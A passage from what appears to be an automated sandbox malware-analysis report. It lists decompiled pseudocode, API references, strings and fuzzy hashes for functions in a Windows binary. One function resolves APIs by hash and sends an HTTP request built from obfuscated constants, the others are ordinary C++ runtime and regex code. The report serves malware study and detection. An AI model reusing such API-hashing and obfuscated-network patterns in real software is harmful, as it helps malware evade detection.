				char _v64;
				intOrPtr* _t36;
				intOrPtr _t37;
				void* _t42;
				intOrPtr* _t43;
				void* _t44;
				WCHAR* _t52;
				void* _t66;
				intOrPtr _t69;
				void* _t72;
				intOrPtr* _t73;
				void* _t75;

				_t75 = __eflags;
				E0040BB6B(__ecx);
				E0040BB7B(__ecx, _t75);
				_t69 =  *((intOrPtr*)(__ecx + 4));
				_t36 = E004010BB(__ebx, 6, 0xbe618d28);
				_t66 = 0;
				_t37 =  *_t36(_t69, _a4, _a48, 0, 0, 3, 0, 0);
				_a4 = _t37;
				if(_t37 != 0) {
					_push(__ebx);
					E00405C38( &_v20, 0x2800);
					_t52 = E00405C7D( &_v20, 0x800);
					if(_a28 == 0) {
						wsprintfW(_t52, L"%s", _a8);
						_t73 = _t72 + 0xc;
					} else {
						wsprintfW(_t52, L"%s%s", _a8, _a28);
						_t73 = _t72 + 0x10;
					}
					_a28 = 0x8404f700;
					if(_a48 == 0x1bb) {
						_a28 = 0x8484f700;
					}
					_v64 = 0x5c40668f;
					_v60 = 0xa2f689ef;
					_v56 = 0x9f4ffea2;
					_v52 = 0x492c8fa5;
					_v48 = 0xb870fc72;
					_v44 = 0xb870fc60;
					_v40 = 0xc1604154;
					_v36 = 0xbc9ca0a3;
					_v32 = 0x54b098e8;
					_v28 = 0xe4dfd4a;
					_v24 = 0xb82d;
					_t42 = E00407563( &_v64);
					 *_t73 = 0x15100039;
					_t43 = E004010BB(_t52);
					_t53 = _a4;
					_t44 =  *_t43(_a4, _a36, _t52, _t42, _t66, _t66, _a28, _t66, 6);
					_t71 = _t44;
					if(_t44 != 0 && E0040BB36(_t71, _a40, _a44, _a12, _a16) != 0) {
						_t66 = 1;
					}
					E00401B13(_t71);
					E00401B13(_t53);
					E00405C6C( &_v20);
					return _t66;
				}
				return _t37;
			}

0x0040bd14
0x0040bd1e
0x0040bd25
0x0040bd2a
0x0040bd34
0x0040bd3b
0x0040bd4a
0x0040bd4c
0x0040bd51
0x0040bd57
0x0040bd60
0x0040bd72
0x0040bd77
0x0040bd99
0x0040bd9f
0x0040bd79
0x0040bd85
0x0040bd8b
0x0040bd8b
0x0040bda9
0x0040bdb0
0x0040bdb2
0x0040bdb2
0x0040bdbc
0x0040bdc4
0x0040bdcb
0x0040bdd2
0x0040bdd9
0x0040bde0
0x0040bde7
0x0040bdee
0x0040bdf5
0x0040bdfc
0x0040be03
0x0040be09
0x0040be0e
0x0040be19
0x0040be2b
0x0040be2f
0x0040be31
0x0040be35
0x0040be52
0x0040be52
0x0040be54
0x0040be5a
0x0040be64
0x00000000
0x0040be6b
0x0040be71

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

Part of subcall function 00405C38: VirtualAlloc.KERNELBASE(00000000,0040C0AD,00003000,00000040,00000000,?,?,0040C0AD,?,?,?,?,?,?,?,0040165A), ref: 00405C55

wsprintfW.USER32 ref: 0040BD85
wsprintfW.USER32 ref: 0040BD99

Part of subcall function 00405C6C: VirtualFree.KERNELBASE(?,00000000,00008000,0040C1A3,?,?,?,?,?,?,0040165A,00000000,00000020,00000001,00000000), ref: 00405C76

Strings

%s%s, xrefs: 0040BD7F

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtualwsprintf$AllocFreeLibraryLoad
String ID: %s%s
API String ID: 3687092575-3252725368
Opcode ID: 38fadc611ddd4895382fcb58d3e1cc853dbca558aee5bd828a47114c965fee03
Instruction ID: 9b0736432c3fab07b65583033206c984d6f477a1f3077b15f8be30c6aa633b97
Opcode Fuzzy Hash: 38fadc611ddd4895382fcb58d3e1cc853dbca558aee5bd828a47114c965fee03
Instruction Fuzzy Hash: C531A271904208BBDB11AF62DC85EDF7B78EF45754F00412AFA15762A1DB398910CBA9

Uniqueness

Uniqueness Score: 100.00%

Function 00409F50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79
UNIQUE

Download Yara Rule

C-Code - Quality: 69%

			E00409F50(intOrPtr __ecx, void* _a4, signed char* _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v68;
				char _v112;
				void* __ebx;
				void* __ebp;
				intOrPtr _t38;
				signed int _t42;
				signed char* _t44;
				void* _t51;
				signed char** _t53;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t61;
				void* _t65;

				_push(0xffffffff);
				_push(E00435CE0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t61;
				_v20 = _t61 - 0x60;
				_t57 = __ecx;
				_v24 = __ecx;
				_t53 = E0041F589(_t51);
				E00413974(_t51, _t65,  &_v68);
				 *((intOrPtr*)(_t57 + 8)) = 0;
				 *((intOrPtr*)(_t57 + 0x10)) = 0;
				 *((intOrPtr*)(_t57 + 0x14)) = 0;
				_v8 = 0;
				_t44 = _a8;
				if(_t44 == 0) {
					_a8 = _t53[2];
				} else {
					_a8 = 0x437704;
				}
				_push(E00409B90( &_v112));
				_push(0);
				 *((intOrPtr*)(_t57 + 8)) = E004029F0(_t44, _t60, _a8);
				_push( &_v68);
				_push(0);
				 *((intOrPtr*)(_t57 + 0x10)) = E004029F0(_t44, _t60, "false");
				_push( &_v68);
				_push(0);
				_t38 = E004029F0(_t44, _t60, "true");
				 *((intOrPtr*)(_t57 + 0x14)) = _t38;
				_v8 = 0xffffffff;
				if(_t44 == 0) {
					 *((char*)(_t57 + 0xc)) =  *( *_t53) & 0x000000ff;
					_t42 =  *(_t53[1]) & 0x000000ff;
					 *(_t57 + 0xd) = _t42;
					 *[fs:0x0] = _v16;
					return _t42;
				} else {
					 *((short*)(_t57 + 0xc)) = 0x2c2e;
					 *[fs:0x0] = _v16;
					return _t38;
				}
			}

0x00409f53
0x00409f55
0x00409f60
0x00409f61
0x00409f6e
0x00409f71
0x00409f73
0x00409f7b
0x00409f81
0x00409f89
0x00409f90
0x00409f97
0x00409f9e
0x00409fa5
0x00409faa
0x00409fb8
0x00409fac
0x00409fac
0x00409fac
0x00409fc7
0x00409fc8
0x00409fd2
0x00409fd8
0x00409fd9
0x00409fe5
0x00409feb
0x00409fec
0x00409ff3
0x00409ffb
0x00409ffe
0x0040a007
0x0040a027
0x0040a02d
0x0040a030
0x0040a036
0x0040a043
0x0040a009
0x0040a009
0x0040a012
0x0040a01f
0x0040a01f

APIs

__Getcvt.LIBCPMT ref: 00409F81

Part of subcall function 00409B90: __Getcvt.LIBCPMT ref: 00409B97

Part of subcall function 004029F0: Concurrency::cancel_current_task.LIBCPMT ref: 00402A36

Strings

true, xrefs: 00409FEE
false, xrefs: 00409FDB

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Getcvt$Concurrency::cancel_current_task
String ID: false$true
API String ID: 1267538876-2658103896
Opcode ID: c0632bf2eca7f30d6635a39da5dc1733d2d61a9d94058a4fef92086a43568602
Instruction ID: 00a114bd6da0e42b05d246d98c2d9de69644d403f38f7ec43b41c156f7ebadcd
Opcode Fuzzy Hash: c0632bf2eca7f30d6635a39da5dc1733d2d61a9d94058a4fef92086a43568602
Instruction Fuzzy Hash: 3F31D1B2900744AFC720DF55D801BAABBF8FB04720F10862FF895A7781D779AA04CB95

Uniqueness

Uniqueness Score: 100.00%

Function 0042D921, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79UNIQUE

Download Yara Rule

APIs

Part of subcall function 0042094E: RtlEnterCriticalSection.NTDLL(?), ref: 0042095D

Part of subcall function 0042D701: _free.LIBCMT ref: 0042D770

RtlLeaveCriticalSection.NTDLL(00000000), ref: 0042D9CC

Part of subcall function 0042D847: RtlEnterCriticalSection.NTDLL(00000000), ref: 0042D862

RtlEnterCriticalSection.NTDLL(00000000), ref: 0042D9BF

Strings

*<C, xrefs: 0042D9D2

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: CriticalSection$Enter$Leave_free
String ID: *<C
API String ID: 2986790061-1455256561
Opcode ID: be374970cd52f163edc95200f7a38ffff21cb881f0523c18670183181ce0dab1
Instruction ID: 4587283d0caae61b6dd13b594a8675b24384a8e7008c448931ef9fa4f6165991
Opcode Fuzzy Hash: be374970cd52f163edc95200f7a38ffff21cb881f0523c18670183181ce0dab1
Instruction Fuzzy Hash: 132128B1F007218BDB149F69AC407D9B7A16B4D310F95012EF506AB3D2C778D981CB88

Uniqueness

Uniqueness Score: 100.00%

Function 004104C0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
UNIQUE

Download Yara Rule

C-Code - Quality: 51%

			E004104C0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __ebp, char _a4, intOrPtr* _a8, intOrPtr _a12) {
				void* _t18;
				signed int _t19;
				signed int _t20;
				void* _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;
				void* _t30;
				intOrPtr* _t32;
				intOrPtr* _t33;

				_t26 = __ecx;
				_t25 = __ebx;
				_t32 = _a4;
				_t38 =  *((intOrPtr*)(_t32 + 0x14)) - 0x10;
				if( *((intOrPtr*)(_t32 + 0x14)) >= 0x10) {
					_t32 =  *_t32;
				}
				 *((intOrPtr*)(E0041A8EF(_t38))) = 0;
				_t30 = E0041B3A5(_t26, _t32,  &_a4, _a12);
				_t39 = _t32 - _a4;
				if(_t32 == _a4) {
					_push("invalid stoi argument");
					E004136DB(_t25, _t30, __eflags);
					goto L8;
				} else {
					if( *((intOrPtr*)(E0041A8EF(_t39))) == 0x22) {
						L8:
						_push("stoi argument out of range");
						E0041371B(_t25, _t30, __eflags);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t32);
						_t33 = _t26;
						__eflags =  *(_t33 + 0x4c);
						if( *(_t33 + 0x4c) == 0) {
							L12:
							__eflags = 0;
							return 0;
						} else {
							_t18 =  *((intOrPtr*)( *_t33 + 0xc))(0xffffffff);
							__eflags = _t18 - 0xffffffff;
							if(_t18 == 0xffffffff) {
								goto L12;
							} else {
								_t19 = E0041BA53(_t26,  *(_t33 + 0x4c));
								__eflags = _t19;
								if(_t19 >= 0) {
									goto L12;
								} else {
									_t20 = _t19 | 0xffffffff;
									__eflags = _t20;
									return _t20;
								}
							}
						}
					} else {
						_t27 = _a8;
						if(_t27 != 0) {
							 *_t27 = _a4 - _t32;
						}
						return _t30;
					}
				}
			}

0x004104c0
0x004104c0
0x004104c1
0x004104c6
0x004104ca
0x004104cc
0x004104cc
0x004104d7
0x004104eb
0x004104ed
0x004104f1
0x00410512
0x00410517
0x00000000
0x004104f3
0x004104fb
0x0041051c
0x0041051c
0x00410521
0x00410526
0x00410527
0x00410528
0x00410529
0x0041052a
0x0041052b
0x0041052c
0x0041052d
0x0041052e
0x0041052f
0x00410530
0x00410531
0x00410533
0x00410537
0x00410559
0x00410559
0x0041055c
0x00410539
0x0041053d
0x00410540
0x00410543
0x00000000
0x00410545
0x00410548
0x00410550
0x00410552
0x00000000
0x00410554
0x00410554
0x00410554
0x00410558
0x00410558
0x00410552
0x00410543
0x004104fd
0x004104fd
0x00410503
0x0041050b
0x0041050b
0x00410511
0x00410511
0x004104fb

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00410517

Part of subcall function 004136DB: std::invalid_argument::invalid_argument.LIBCONCRT ref: 004136E7
Part of subcall function 004136DB: __CxxThrowException@8.LIBVCRUNTIME ref: 004136F5

Part of subcall function 0041371B: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00413727
Part of subcall function 0041371B: __CxxThrowException@8.LIBVCRUNTIME ref: 00413735

Strings

stoi argument out of range, xrefs: 0041051C
invalid stoi argument, xrefs: 00410512

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument$Xinvalid_argumentstd::_
String ID: invalid stoi argument$stoi argument out of range
API String ID: 2589434974-1606216832
Opcode ID: 6d986ab1d86270c5994593958e6925b8fcbb177c2b1c993cbae50889696093c5
Instruction ID: b89ad8647041a4247f1b35655688ec48bf90ccaa1a744d49486cacb86d35584a
Opcode Fuzzy Hash: 6d986ab1d86270c5994593958e6925b8fcbb177c2b1c993cbae50889696093c5
Instruction Fuzzy Hash: 8501E571204210AFC724EF29E8046DA73E59F81324F154A2FF464C3290D778ECC0CBAA

Uniqueness

Uniqueness Score: 100.00%

Function 00401060, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
UNIQUE

Download Yara Rule

C-Code - Quality: 90%

			E00401060(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t3;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;
				intOrPtr* _t14;
				void* _t16;

				_t11 = __esi;
				_t10 = __edi;
				_t9 = __edx;
				_t6 = __ebx;
				 *0x44c7c8 = E00413DB8();
				 *0x44c7bc = E00403960(__ebx, __edx, _t10, _t12, 0x44c7c4, 1);
				_t3 = E00403A70(__ebx, __edx, _t10, _t12, 0x44c7c4, __ecx);
				_t14 = _t13 + 0xc;
				 *_t14 = 0;
				 *0x44c7c0 = _t3;
				_push( *_t14);
				E00402F10(_t6, 0x44c7b8, _t9, _t10, _t11, _t12, _t16, "^\\s*(?:q|quit|exit)\\s*$", 0x4376bb, 0x500);
				return E004152AA(_t16, E00435FC0);
			}

0x00401060
0x00401060
0x00401060
0x00401060
0x0040106d
0x0040107c
0x00401081
0x00401086
0x00401089
0x00401092
0x00401097
0x004010a9
0x004010bb

APIs

std::locale::_Init.LIBCPMT ref: 00401063

Part of subcall function 00413DB8: std::_Lockit::_Lockit.LIBCPMT ref: 00413DCA
Part of subcall function 00413DB8: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00413DDD
Part of subcall function 00413DB8: std::locale::_Setgloballocale.LIBCPMT ref: 00413DE5
Part of subcall function 00413DB8: _Yarn.LIBCPMT ref: 00413DFB
Part of subcall function 00413DB8: std::_Lockit::~_Lockit.LIBCPMT ref: 00413E39

Part of subcall function 00403960: std::_Lockit::_Lockit.LIBCPMT ref: 0040396D
Part of subcall function 00403960: std::_Lockit::_Lockit.LIBCPMT ref: 0040398B
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 004039AC
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 004039F5
Part of subcall function 00403960: std::_Facet_Register.LIBCPMT ref: 00403A29
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 00403A35
Part of subcall function 00403960: __CxxThrowException@8.LIBVCRUNTIME ref: 00403A67

Part of subcall function 00403A70: std::_Lockit::_Lockit.LIBCPMT ref: 00403A7D
Part of subcall function 00403A70: std::_Lockit::_Lockit.LIBCPMT ref: 00403A9B
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403ABC
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403B05
Part of subcall function 00403A70: std::_Facet_Register.LIBCPMT ref: 00403B39
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403B45
Part of subcall function 00403A70: __CxxThrowException@8.LIBVCRUNTIME ref: 00403B77

Part of subcall function 004152AA: __onexit.LIBCMT ref: 004152B0

Strings

^\s*(?:q|quit|exit)\s*$, xrefs: 004010A4
`7), xrefs: 0040106D

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$std::locale::_$Exception@8Facet_RegisterThrow$InitLocimpLocimp::_New_SetgloballocaleYarn__onexit
String ID: ^\s*(?:q|quit|exit)\s*$$`7)
API String ID: 3878167811-3880912074
Opcode ID: 3583661ba9caabc7942ffc3376894d380cddd26deb4eb36fdbd3e6053a0203d5
Instruction ID: abf41328c1787b19eeb2f876d4dbd93d1f350d67fd0604e5522d7aae07dac38a
Opcode Fuzzy Hash: 3583661ba9caabc7942ffc3376894d380cddd26deb4eb36fdbd3e6053a0203d5
Instruction Fuzzy Hash: 22E0D8B9A857036BE7807B715C93B1839509B01F05F58083FF480252C6E7FD01408F5E

Uniqueness

Uniqueness Score: 100.00%

Function 00401000, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
UNIQUE

Download Yara Rule

C-Code - Quality: 90%

			E00401000(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t3;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;
				intOrPtr* _t14;
				void* _t16;

				_t11 = __esi;
				_t10 = __edi;
				_t9 = __edx;
				_t6 = __ebx;
				 *0x44c7b4 = E00413DB8();
				 *0x44c7a8 = E00403960(__ebx, __edx, _t10, _t12, 0x44c7b0, 1);
				_t3 = E00403A70(__ebx, __edx, _t10, _t12, 0x44c7b0, __ecx);
				_t14 = _t13 + 0xc;
				 *_t14 = 0;
				 *0x44c7ac = _t3;
				_push( *_t14);
				E00402F10(_t6, 0x44c7a4, _t9, _t10, _t11, _t12, _t16, "^\\s*(?:e|edge)\\s*(\\w+)\\s*->\\s*(\\w+)\\s+(\\d+)\\s*$", 0x43767b, 0x500);
				return E004152AA(_t16, E00435F70);
			}

0x00401000
0x00401000
0x00401000
0x00401000
0x0040100d
0x0040101c
0x00401021
0x00401026
0x00401029
0x00401032
0x00401037
0x00401049
0x0040105b

APIs

std::locale::_Init.LIBCPMT ref: 00401003

Part of subcall function 00413DB8: std::_Lockit::_Lockit.LIBCPMT ref: 00413DCA
Part of subcall function 00413DB8: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00413DDD
Part of subcall function 00413DB8: std::locale::_Setgloballocale.LIBCPMT ref: 00413DE5
Part of subcall function 00413DB8: _Yarn.LIBCPMT ref: 00413DFB
Part of subcall function 00413DB8: std::_Lockit::~_Lockit.LIBCPMT ref: 00413E39

Part of subcall function 00403960: std::_Lockit::_Lockit.LIBCPMT ref: 0040396D
Part of subcall function 00403960: std::_Lockit::_Lockit.LIBCPMT ref: 0040398B
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 004039AC
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 004039F5
Part of subcall function 00403960: std::_Facet_Register.LIBCPMT ref: 00403A29
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 00403A35
Part of subcall function 00403960: __CxxThrowException@8.LIBVCRUNTIME ref: 00403A67

Part of subcall function 00403A70: std::_Lockit::_Lockit.LIBCPMT ref: 00403A7D
Part of subcall function 00403A70: std::_Lockit::_Lockit.LIBCPMT ref: 00403A9B
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403ABC
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403B05
Part of subcall function 00403A70: std::_Facet_Register.LIBCPMT ref: 00403B39
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403B45
Part of subcall function 00403A70: __CxxThrowException@8.LIBVCRUNTIME ref: 00403B77

Part of subcall function 004152AA: __onexit.LIBCMT ref: 004152B0

Strings

`7), xrefs: 0040100D
^\s*(?:e|edge)\s*(\w+)\s*->\s*(\w+)\s+(\d+)\s*$, xrefs: 00401044

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$std::locale::_$Exception@8Facet_RegisterThrow$InitLocimpLocimp::_New_SetgloballocaleYarn__onexit
String ID: ^\s*(?:e|edge)\s*(\w+)\s*->\s*(\w+)\s+(\d+)\s*$$`7)
API String ID: 3878167811-2003203903
Opcode ID: 52c8a98041635ab6ba8d957cba7384f0638c0da0dca96005e8fec6206688c488
Instruction ID: c370e4610c00bdf78d70e5c3d49e80567fe8de22fb59710897a22971a3e684d0
Opcode Fuzzy Hash: 52c8a98041635ab6ba8d957cba7384f0638c0da0dca96005e8fec6206688c488
Instruction Fuzzy Hash: CEE092B8A853016BE7407B715C93B1539408B41709F18143FB180252C2EBFE01404E5D

Uniqueness

Uniqueness Score: 100.00%

Function 00401120, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
UNIQUE

Download Yara Rule

C-Code - Quality: 90%

			E00401120(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t3;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;
				intOrPtr* _t14;
				void* _t16;

				_t11 = __esi;
				_t10 = __edi;
				_t9 = __edx;
				_t6 = __ebx;
				 *0x44c778 = E00413DB8();
				 *0x44c76c = E00403960(__ebx, __edx, _t10, _t12, 0x44c774, 1);
				_t3 = E00403A70(__ebx, __edx, _t10, _t12, 0x44c774, __ecx);
				_t14 = _t13 + 0xc;
				 *_t14 = 0;
				 *0x44c770 = _t3;
				_push( *_t14);
				E00402F10(_t6, 0x44c768, _t9, _t10, _t11, _t12, _t16, "^\\s*(?:r|remove)\\s*(\\w+)\\s*$", 0x437614, 0x500);
				return E004152AA(_t16, E00436060);
			}

0x00401120
0x00401120
0x00401120
0x00401120
0x0040112d
0x0040113c
0x00401141
0x00401146
0x00401149
0x00401152
0x00401157
0x00401169
0x0040117b

APIs

std::locale::_Init.LIBCPMT ref: 00401123

Part of subcall function 00413DB8: std::_Lockit::_Lockit.LIBCPMT ref: 00413DCA
Part of subcall function 00413DB8: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00413DDD
Part of subcall function 00413DB8: std::locale::_Setgloballocale.LIBCPMT ref: 00413DE5
Part of subcall function 00413DB8: _Yarn.LIBCPMT ref: 00413DFB
Part of subcall function 00413DB8: std::_Lockit::~_Lockit.LIBCPMT ref: 00413E39

Part of subcall function 00403960: std::_Lockit::_Lockit.LIBCPMT ref: 0040396D
Part of subcall function 00403960: std::_Lockit::_Lockit.LIBCPMT ref: 0040398B
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 004039AC
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 004039F5
Part of subcall function 00403960: std::_Facet_Register.LIBCPMT ref: 00403A29
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 00403A35
Part of subcall function 00403960: __CxxThrowException@8.LIBVCRUNTIME ref: 00403A67

Part of subcall function 00403A70: std::_Lockit::_Lockit.LIBCPMT ref: 00403A7D
Part of subcall function 00403A70: std::_Lockit::_Lockit.LIBCPMT ref: 00403A9B
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403ABC
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403B05
Part of subcall function 00403A70: std::_Facet_Register.LIBCPMT ref: 00403B39
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403B45
Part of subcall function 00403A70: __CxxThrowException@8.LIBVCRUNTIME ref: 00403B77

Part of subcall function 004152AA: __onexit.LIBCMT ref: 004152B0

Strings

^\s*(?:r|remove)\s*(\w+)\s*$, xrefs: 00401164
`7), xrefs: 0040112D

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$std::locale::_$Exception@8Facet_RegisterThrow$InitLocimpLocimp::_New_SetgloballocaleYarn__onexit
String ID: ^\s*(?:r|remove)\s*(\w+)\s*$$`7)
API String ID: 3878167811-2761046471
Opcode ID: 15cbfc979ad1520e621fd40d7a10904426e327c0c3827e480cd4f8fbd88b7dac
Instruction ID: 3a6dce0b849aa154fe4c97bba9551c189930091100ba825b12b8ec4d61b51b95
Opcode Fuzzy Hash: 15cbfc979ad1520e621fd40d7a10904426e327c0c3827e480cd4f8fbd88b7dac
Instruction Fuzzy Hash: 2BE092B8AC63056BE6407B715C83B1839509B43B05F58043FB080351D2E7FD21408F1D

Uniqueness

Uniqueness Score: 100.00%

Function 00401180, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
UNIQUE

Download Yara Rule

C-Code - Quality: 90%

			E00401180(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t3;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;
				intOrPtr* _t14;
				void* _t16;

				_t11 = __esi;
				_t10 = __edi;
				_t9 = __edx;
				_t6 = __ebx;
				 *0x44c78c = E00413DB8();
				 *0x44c780 = E00403960(__ebx, __edx, _t10, _t12, 0x44c788, 1);
				_t3 = E00403A70(__ebx, __edx, _t10, _t12, 0x44c788, __ecx);
				_t14 = _t13 + 0xc;
				 *_t14 = 0;
				 *0x44c784 = _t3;
				_push( *_t14);
				E00402F10(_t6, 0x44c77c, _t9, _t10, _t11, _t12, _t16, "^\\s*(?:g|graphviz)\\s+([^\\\\\\?%\\*]+)\\s*$", 0x4376a2, 0x500);
				return E004152AA(_t16, E004360B0);
			}

0x00401180
0x00401180
0x00401180
0x00401180
0x0040118d
0x0040119c
0x004011a1
0x004011a6
0x004011a9
0x004011b2
0x004011b7
0x004011c9
0x004011db

APIs

std::locale::_Init.LIBCPMT ref: 00401183

Part of subcall function 00413DB8: std::_Lockit::_Lockit.LIBCPMT ref: 00413DCA
Part of subcall function 00413DB8: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00413DDD
Part of subcall function 00413DB8: std::locale::_Setgloballocale.LIBCPMT ref: 00413DE5
Part of subcall function 00413DB8: _Yarn.LIBCPMT ref: 00413DFB
Part of subcall function 00413DB8: std::_Lockit::~_Lockit.LIBCPMT ref: 00413E39

Part of subcall function 00403960: std::_Lockit::_Lockit.LIBCPMT ref: 0040396D
Part of subcall function 00403960: std::_Lockit::_Lockit.LIBCPMT ref: 0040398B
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 004039AC
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 004039F5
Part of subcall function 00403960: std::_Facet_Register.LIBCPMT ref: 00403A29
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 00403A35
Part of subcall function 00403960: __CxxThrowException@8.LIBVCRUNTIME ref: 00403A67

Part of subcall function 00403A70: std::_Lockit::_Lockit.LIBCPMT ref: 00403A7D
Part of subcall function 00403A70: std::_Lockit::_Lockit.LIBCPMT ref: 00403A9B
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403ABC
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403B05
Part of subcall function 00403A70: std::_Facet_Register.LIBCPMT ref: 00403B39
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403B45
Part of subcall function 00403A70: __CxxThrowException@8.LIBVCRUNTIME ref: 00403B77

Part of subcall function 004152AA: __onexit.LIBCMT ref: 004152B0

Strings

`7), xrefs: 0040118D
^\s*(?:g|graphviz)\s+([^\\\?%\*]+)\s*$, xrefs: 004011C4

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
